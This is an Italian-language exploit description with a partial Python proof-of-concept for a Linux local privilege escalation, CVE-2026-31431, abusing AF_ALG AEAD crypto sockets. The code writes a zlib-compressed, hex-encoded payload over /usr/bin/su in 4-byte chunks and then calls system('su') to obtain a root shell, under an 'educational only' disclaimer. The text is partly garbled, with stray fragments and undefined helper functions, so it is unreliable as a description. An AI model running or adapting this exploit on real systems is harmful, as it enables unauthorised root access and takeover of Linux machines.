
Exploit di escalation dei privilegi locali per CVE-2026-31431, che abusa della gestione dei socket AF_ALG AEAD per ottenere l'accesso a una shell di root su kernel Linux vulnerabili.
CVE-2026-31431 è una vulnerabilità di escalation dei privilegi in Linux che abusa dell'interfaccia AF_ALG (API crittografica del kernel). Creando un'interazione dannosa con i socket AEAD (Autenticazione Crittografata con Dati Associati), un attaccante può aumentare i propri privilegi ed eseguire codice come root.
Questa vulnerabilità sfrutta una gestione impropria delle operazioni sui socket crittografici, consentendo una manipolazione controllata della memoria e la conseguente escalation dei privilegi.
/usr/bin/su)L'exploit:
Crea un socket AF_ALG
Si associa a:
authenc(hmac(sha256),cbc(aes))
Utilizza payload appositamente costruiti tramite setsockopt e sendmsg
Attiva un comportamento indesiderato del kernel
Accede a una shell root tramite:
g.system("su")
Indicatori chiave:
socket(38,5,0) → AF_ALGzlib)
**Disclaimer: Non possiedo questo PoC. È solo a scopo educativo per test in ambienti dove è disponibile l'autorizzazione. L'autore/proprietario non sarà responsabile di alcun uso improprio. **
f=g.open("/usr/bin/su",0)
i=0
e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):
c(f,i,e[i:i+4])
i+=4
g.system("su")